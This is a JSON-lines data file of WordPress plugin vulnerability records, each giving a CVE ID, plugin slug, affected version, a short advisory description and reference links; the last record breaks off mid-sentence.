{"CVE_ID":"CVE-2024-1334","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the enableOptimization function. This makes it possible for unauthenticated attackers to enable image optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0318ec4a-185a-405d-90f8-008ba373114b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0318ec4a-185a-405d-90f8-008ba373114b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7015","slug":"wp-file-manager-pro","versionImpact":"8.3.4","description":"The File Manager Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tb' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94750424-bb52-4236-962e-aa8cbdeb1459?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94750424-bb52-4236-962e-aa8cbdeb1459?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9421","slug":"login-logout-shortcode","versionImpact":"1.1.0","description":"The Login Logout Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f7ce513-45ba-427b-8ee0-1007e404c1a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f7ce513-45ba-427b-8ee0-1007e404c1a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-logout-shortcode\\\/trunk\\\/login-logout-shortcode.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-logout-shortcode\\\/trunk\\\/login-logout-shortcode.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-shortcode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-shortcode\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10629","slug":"gpx-viewer","versionImpact":"2.2.8","description":"The GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6ff21-52f5-453f-bf97-881c39be1aeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfc6ff21-52f5-453f-bf97-881c39be1aeb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gpx-viewer\\\/tags\\\/2.2.9\\\/gpx-viewer-admin.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gpx-viewer\\\/tags\\\/2.2.9\\\/gpx-viewer-admin.php#L144\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12047","slug":"wp-compress-image-optimizer","versionImpact":"6.30.03","description":"The WP Compress \u2013 Instant Performance & Speed Optimization plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018custom_server\u2019 parameter in all versions up to, and including, 6.30.03 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.00\\\/addons\\\/cdn\\\/cdn-rewrite.php#L459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.00\\\/addons\\\/cdn\\\/cdn-rewrite.php#L459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213738\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213738\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09c04863-a454-4f05-9403-aff39dbccd43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09c04863-a454-4f05-9403-aff39dbccd43?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13472","slug":"wc-product-table-lite","versionImpact":"3.9.4","description":"The The WooCommerce Product Table Lite plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.9.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The same 'sc_attrs' parameter is vulnerable to Reflected Cross-Site Scripting as well.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/main.php#L1843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-product-table-lite\\\/trunk\\\/main.php#L1843\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231930\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231930\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-product-table-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-product-table-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f1a1171-3d7b-46a4-982e-fe318e3017b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f1a1171-3d7b-46a4-982e-fe318e3017b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0954","slug":"onlinecontract","versionImpact":"5.1.4","description":"The WP Online Contract plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the json_import() and json_export() functions in all versions up to, and including, 5.1.4. This makes it possible for unauthenticated attackers to import and export the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-online-contract\\\/7698011\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-online-contract\\\/7698011\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f464ca-ff6c-4c2e-8b56-bf5e4bc6bd1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f464ca-ff6c-4c2e-8b56-bf5e4bc6bd1f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30552","slug":"wordpress-admin-bar-improved","versionImpact":"3.3.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in Donald Gilbert WordPress Admin Bar Improved allows Stored XSS. This issue affects WordPress Admin Bar Improved: from n\/a through 3.3.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-admin-bar-improved\\\/vulnerability\\\/wordpress-wordpress-admin-bar-improved-plugin-3-3-5-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-admin-bar-improved\\\/vulnerability\\\/wordpress-wordpress-admin-bar-improved-plugin-3-3-5-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5096","slug":"tablepress","versionImpact":"3.1.2","description":"The TablePress plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the 'data-caption', 'data-s-content-padding', 'data-s-title', and 'data-footer' data-attributes in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/datatables.net\\\/\",\"name\":\"https:\\\/\\\/datatables.net\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/blob\\\/29539c40504365bc4be0599e4b0739cf270a2e09\\\/js\\\/core\\\/core.constructor.js#L329\",\"name\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/blob\\\/29539c40504365bc4be0599e4b0739cf270a2e09\\\/js\\\/core\\\/core.constructor.js#L329\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d278ed307035cb8740d2fad86b7cbb995380f7bb\",\"name\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d278ed307035cb8740d2fad86b7cbb995380f7bb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d558328106bef2d48dfc4cf78581dd106f5c1077\",\"name\":\"https:\\\/\\\/github.com\\\/DataTables\\\/DataTablesSrc\\\/commit\\\/d558328106bef2d48dfc4cf78581dd106f5c1077\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/tags\\\/3.1.2\\\/js\\\/jquery.datatables.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/tags\\\/3.1.2\\\/js\\\/jquery.datatables.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298453\\\/tablepress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298453\\\/tablepress\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tablepress.org\\\/release-announcement-tablepress-3-1-3\\\/\",\"name\":\"https:\\\/\\\/tablepress.org\\\/release-announcement-tablepress-3-1-3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tablepress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tablepress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2dfa02-0404-4300-a5ed-6326f9df6d30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd2dfa02-0404-4300-a5ed-6326f9df6d30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6687","slug":"magic-buttons-for-elementor","versionImpact":"1.0","description":"The Magic Buttons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's magic-button shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-buttons-for-elementor\\\/trunk\\\/magic_buttons_shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-buttons-for-elementor\\\/trunk\\\/magic_buttons_shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25eb1c89-0121-4ea5-a29a-43ec98c468ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25eb1c89-0121-4ea5-a29a-43ec98c468ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8196","slug":"magical-addons-for-elementor","versionImpact":"1.3.8","description":"The Magical Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Custom Attributes in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334530\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334530\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magical-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magical-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58854b23-e679-4349-aa7c-4edf4008c92a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58854b23-e679-4349-aa7c-4edf4008c92a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0715","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_clone_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3728280-3487-4cb2-8e37-f33811bc0a22\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3728280-3487-4cb2-8e37-f33811bc0a22\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2433","slug":"yet-another-related-posts-plugin","versionImpact":"5.30.3","description":"The YARPP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'className' parameter in versions up to, and including, 5.30.3 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939617\\\/yet-another-related-posts-plugin\\\/trunk\\\/classes\\\/YARPP_Core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2939617\\\/yet-another-related-posts-plugin\\\/trunk\\\/classes\\\/YARPP_Core.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35bd7462-8dab-43b2-9941-fef6f826cfdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35bd7462-8dab-43b2-9941-fef6f826cfdc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.3\\\/classes\\\/YARPP_Core.php#L1623\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yet-another-related-posts-plugin\\\/tags\\\/5.30.3\\\/classes\\\/YARPP_Core.php#L1623\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6390","slug":"wordpress-users","versionImpact":"1.4","description":"The WordPress Users WordPress plugin through 1.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0ca68d3-f885-46c9-9f6b-b77ad387d25d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0ca68d3-f885-46c9-9f6b-b77ad387d25d\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6390.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6390.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6969","slug":"user-shortcodes-plus","versionImpact":"2.0.2","description":"The User Shortcodes Plus plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.2 via the user_meta shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve potentially sensitive user meta.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76a0a87a-dff0-4a51-bad0-8868c342ecde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76a0a87a-dff0-4a51-bad0-8868c342ecde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-shortcodes-plus\\\/trunk\\\/includes\\\/Shortcodes\\\/UserMeta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-shortcodes-plus\\\/trunk\\\/includes\\\/Shortcodes\\\/UserMeta.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4290","slug":"sailthru-triggermail","versionImpact":"1.1","description":"The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a10d0f-d8f2-4f3e-92bf-94fc08416d87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a10d0f-d8f2-4f3e-92bf-94fc08416d87\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10577","slug":"fat-rat-collect","versionImpact":"2.7.3","description":"The ????(Fat Rat Collect) ????????????????, ??????????????????????????? plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to missing escaping on a URL in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664d265b-7b35-4c61-b48b-d051b7fb5ebd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664d265b-7b35-4c61-b48b-d051b7fb5ebd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fat-rat-collect\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fat-rat-collect\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11974","slug":"media-library-assistant","versionImpact":"3.23","description":"The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018smc_settings_tab', 'unattachfixit-action', and 'woofixit-action\u2019 parameters in all versions up to, and including, 3.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/mla-unattached-fixit.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/mla-unattached-fixit.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/smart-media-categories\\\/admin\\\/includes\\\/class-smc-settings-support.php#L459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/smart-media-categories\\\/admin\\\/includes\\\/class-smc-settings-support.php#L459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/woofixit.php#L1391\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/examples\\\/plugins\\\/woofixit.php#L1391\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215759\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3215759\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f4e5e1-4c2e-4943-aa84-4caa61e14bc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f4e5e1-4c2e-4943-aa84-4caa61e14bc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23961","slug":"graph-lite","versionImpact":"2.0.8","description":"Missing Authorization vulnerability in WP Tasker WordPress Graphs & Charts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Graphs & Charts: from n\/a through 2.0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/graph-lite\\\/vulnerability\\\/wordpress-wordpress-graphs-charts-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/graph-lite\\\/vulnerability\\\/wordpress-wordpress-graphs-charts-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30526","slug":"typekit","versionImpact":"1.2.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in lucksy Typekit plugin for WordPress allows Cross Site Request Forgery. This issue affects Typekit plugin for WordPress: from n\/a through 1.2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/typekit\\\/vulnerability\\\/wordpress-typekit-plugin-1-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/typekit\\\/vulnerability\\\/wordpress-typekit-plugin-1-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6686","slug":"magic-buttons-for-elementor","versionImpact":"1.0","description":"The Magic Buttons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's magic-button shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-buttons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4379f2c5-3533-45f7-a4ef-0b3320eb5d04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4379f2c5-3533-45f7-a4ef-0b3320eb5d04?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7689","slug":"hydra-booking","description":"The Hydra Booking plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the tfhb_reset_password_callback() function in versions 1.1.0 to 1.1.18. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the password of an Administrator user, achieving full privilege 